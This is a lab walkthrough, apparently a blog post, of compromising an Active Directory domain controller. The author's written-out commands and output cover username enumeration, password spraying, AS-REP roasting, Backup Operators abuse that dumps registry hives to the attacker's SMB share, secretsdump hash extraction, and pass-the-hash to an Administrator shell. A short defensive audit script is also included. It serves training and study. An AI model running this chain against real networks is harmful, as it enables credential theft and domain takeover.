After importing the .ova into VirtualBox, the VM fails to start with "Failed to load the NVRAM store from the file"; renaming the virtual machine lets it boot normally.

The target machine's IP is 192.168.56.126

Port scan

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-19 06:54 UTC
Nmap scan report for 192.168.56.126 (192.168.56.126)
Host is up (0.00033s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49670/tcp open unknown
49676/tcp open unknown
49689/tcp open unknown
49709/tcp open unknown
MAC Address: 08:00:27:4C:2D:6C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds
┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sT -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-19 06:59 UTC
Nmap scan report for 192.168.56.126 (192.168.56.126)
Host is up (0.00041s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-19 21:59:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
MAC Address: 08:00:27:4C:2D:6C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4c:2d:6c (Oracle VirtualBox virtual NIC)
|_clock-skew: 14h59m54s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-19T21:59:51
|_ start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.63 seconds

kerbrute

There is no anonymous SMB share access and no credentials yet, so the only option is to blindly run a username wordlist.

┌──(mikannse㉿kali)-[~/桌面]
└─$ kerbrute userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc 192.168.56.126 -d soupedecode.local

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/19/24 - Ronnie Flathers @ropnop

2024/07/19 07:12:51 > Using KDC(s):
2024/07/19 07:12:51 > 192.168.56.126:88

2024/07/19 07:12:51 > [+] VALID USERNAME: charlie@soupedecode.local
2024/07/19 07:12:51 > [+] VALID USERNAME: Charlie@soupedecode.local
2024/07/19 07:12:51 > [+] VALID USERNAME: administrator@soupedecode.local
2024/07/19 07:12:52 > [+] VALID USERNAME: Administrator@soupedecode.local
2024/07/19 07:12:52 > [+] VALID USERNAME: CHARLIE@soupedecode.local
2024/07/19 07:13:55 > [+] VALID USERNAME: wreed11@soupedecode.local
2024/07/19 07:16:07 > [+] VALID USERNAME: printserver@soupedecode.local
2024/07/19 07:18:13 > [+] VALID USERNAME: kleo2@soupedecode.local
2024/07/19 07:20:37 > [+] VALID USERNAME: dc01@soupedecode.local
2024/07/19 07:23:06 > [+] VALID USERNAME: ChArLiE@soupedecode.local
2024/07/19 07:23:07 > [+] VALID USERNAME: CHarlie@soupedecode.local
2024/07/19 07:23:30 > Done! Tested 8295455 usernames (11 valid) in 638.858 seconds

A user charlie exists; use it to look up information on the other users.

┌──(mikannse㉿kali)-[~/桌面]
└─$ lookupsid.py 'soupedecode.local/charlie@192.168.56.126'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Save the usernames as a wordlist

# Extract bare usernames from the saved lookupsid.py output (user.txt).
# Each line looks like: "1103: SOUPEDECODE\bmark0 (SidTypeUser)"
with open('user.txt', 'r') as file1:
    lines = file1.read().splitlines()

with open('username.txt', 'w') as file2:
    for line in lines:
        fields = line.split()
        # skip banner lines and anything without a DOMAIN\name field
        if len(fields) < 2 or '\\' not in fields[1]:
            continue
        # drop the "SOUPEDECODE\" prefix (12 characters) to keep only the name
        username = fields[1].split('\\', 1)[1]
        file2.write(username + '\n')

print('Done')

Brute-force SMB

┌──(mikannse㉿kali)-[~/桌面]
└─$ crackmapexec smb 192.168.56.126 -u username.txt -p username.txt --continue-on-success --no-bruteforce >result

The charlie user has a weak password, but there are still no accessible shares.

GetUserSPNs.py returned nothing either.

GetNPUsers

Use GetNPUsers to scan for domain users that do not require Kerberos pre-authentication; their AS-REP hashes can then be cracked offline.

┌──(mikannse㉿kali)-[~/桌面]
└─$ GetNPUsers.py soupedecode.local/ -dc-ip 192.168.56.126 -usersfile username.txt -no-pass -request >hash
┌──(mikannse㉿kali)-[~/桌面]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
internet ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)
1g 0:00:00:00 DONE (2024-07-19 07:39) 100.0g/s 102400p/s 102400c/s 102400C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This yields the credentials zximena448:internet, but evil-winrm cannot connect; remote management is probably not enabled for this user.

Do some domain enumeration

┌──(mikannse㉿kali)-[~/桌面]
└─$ ldapdomaindump soupedecode.local -u 'soupedecode.local\zximena448' -p 'internet'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

In domain-user-group, the zximena448 user has DONT_REQ_PREAUTH set, which is why its hash could be cracked; in addition, this user is a member of the Backup Operators group.
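The two findings above (DONT_REQ_PREAUTH and Backup Operators membership) are both visible in the directory itself, so a defender can audit for them from an LDAP export. The following is an added example, not code from the original writeup or from ldapdomaindump; the records are constructed samples in a simplified shape (not ldapdomaindump's exact JSON), and every account other than zximena448 is made up.

```python
import json

# userAccountControl bit flags as documented by Microsoft; only the ones
# needed for this check are listed.
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"

# Groups whose membership should be reviewed (Backup Operators is the one
# that mattered on this box).
PRIVILEGED_GROUPS = {"Backup Operators", "Domain Admins", "Account Operators"}

# Constructed sample export (hypothetical accounts apart from zximena448).
SAMPLE_DUMP = json.dumps([
    {"sAMAccountName": "zximena448", "userAccountControl": 0x400200,
     "memberOf": ["CN=Backup Operators,CN=Builtin,DC=soupedecode,DC=local"]},
    {"sAMAccountName": "charlie", "userAccountControl": 0x10200,
     "memberOf": []},
    # pre-auth disabled, but the account itself is disabled: not roastable
    {"sAMAccountName": "olduser", "userAccountControl": 0x400202,
     "memberOf": []},
])

def group_cn(dn):
    """Return the CN of a group DN like 'CN=Backup Operators,CN=Builtin,...'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def audit_accounts(dump_json):
    """Return {sAMAccountName: [finding, ...]} for enabled accounts that are
    AS-REP roastable or that sit in one of PRIVILEGED_GROUPS."""
    findings = {}
    for acct in json.loads(dump_json):
        uac = int(acct["userAccountControl"])
        if uac & UAC_ACCOUNTDISABLE:
            continue  # a disabled account cannot request a TGT at all
        issues = []
        if uac & UAC_DONT_REQ_PREAUTH:
            issues.append("DONT_REQ_PREAUTH set (AS-REP roastable)")
        for dn in acct.get("memberOf", []):
            cn = group_cn(dn)
            if cn in PRIVILEGED_GROUPS:
                issues.append(f"member of {cn}")
        if issues:
            findings[acct["sAMAccountName"]] = issues
    return findings

if __name__ == "__main__":
    for name, issues in audit_accounts(SAMPLE_DUMP).items():
        print(name, "->", "; ".join(issues))
```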

According to https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#backup-operators, this group has access to the file system and could be used to steal the NTDS.dit database. Although ntdsutil or diskshadow could be used to dump the registry, there is no shell yet.

Using this modified impacket tool reg.py (https://github.com/horizon3ai/backup_dc_registry), the registry hives can be dumped remotely; a local SMB share has to be started first to receive them.

┌──(mikannse㉿kali)-[~/桌面]
└─$ smbserver.py kali /tmp/smb/ -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
┌──(mikannse㉿kali)-[~/桌面/tools]
└─$ python reg.py "soupedecode.local"/"zximena448":"internet"@192.168.56.126 backup -p '\\192.168.56.102\kali'
Impacket v0.11.0 - Copyright 2023 Fortra

Dumping SAM hive to \\192.168.56.102\kali\SAM
Dumping SYSTEM hive to \\192.168.56.102\kali\SYSTEM
Dumping SECURITY hive to \\192.168.56.102\kali\SECURITY

secretsdump

Use secretsdump to extract the hashes

┌──(mikannse㉿kali)-[/tmp/smb]
└─$ secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

Unfortunately, none of these three accounts can be used for pass-the-hash via evil-winrm.

When the SECURITY hive is added, new content appears (note: SECURITY holds the domain credentials (LSA secrets); without it only the local accounts are recovered).

┌──(mikannse㉿kali)-[/tmp/smb]
└─$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:6561b8e13f5d352a61ce8974be7a4aadb951781e7d34be4431978d3b2eaf843d90668b98f81f1a9d523d85c377a7d701f62319824491a15e2e936c71f4c04b8471847ccf9835177d71430b56806eda58f5282c1e3d2aa9eb925b112ec85f6101664420817836b70e96f93638f46b69087eafb463f877947b2fb3644d0767d169c40fc3eb175a5e463751327312195584dfbbdf2f1e83ef24b3182acfd1a00bcfb31bbb4e8b16f11a4a34c125857bbc0e644a64f13fe32875bd8c3bed728450514e1751068fb1b615187029950f31c94f1514867f7622c461b715c4275b00e385d2196c8ba4f138463170870a0298bd63
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9e14f65e0038ea6c4eed5273974c2bfc
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../...
0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!.
0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c.
0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Cleaning up...

Pass-the-hash

This gives a domain administrator hash: 9e14f65e0038ea6c4eed5273974c2bfc

┌──(mikannse㉿kali)-[~/桌面]
└─$ crackmapexec smb 192.168.56.126 -u username.txt -H '9e14f65e0038ea6c4eed5273974c2bfc'

It turns out to be the DC01$ account's hash; run secretsdump again with it.

┌──(mikannse㉿kali)-[~/桌面]
└─$ secretsdump.py soupedecode.local/'DC01$'@soupedecode.local -hashes ':9e14f65e0038ea6c4eed5273974c2bfc'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8982babd4da89d33210779a6c5b078bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
soupedecode.local\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::
soupedecode.local\kleo2:1105:aad3b435b51404eeaad3b435b51404ee:bda63615bc51724865a0cd0b4fd9ec14:::
soupedecode.local\eyara3:1106:aad3b435b51404eeaad3b435b51404ee:68e34c259878fd6a31c85cbea32ac671:::
soupedecode.local\pquinn4:1107:aad3b435b51404eeaad3b435b51404ee:92cdedd79a2fe7cbc8c55826b0ff2d54:::
...

This yields the domain Administrator's hash; passing it gives an Administrator shell.

┌──(mikannse㉿kali)-[~/桌面]
└─$ evil-winrm -i soupedecode.local -u 'Administrator' -H '8982babd4da89d33210779a6c5b078bd'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Closing notes

This box's path was a bit more complex than the previous one: remote exploitation of the Backup Operators user was somewhat tricky, and I still don't fully understand the part about using the SECURITY hive after dumping the database.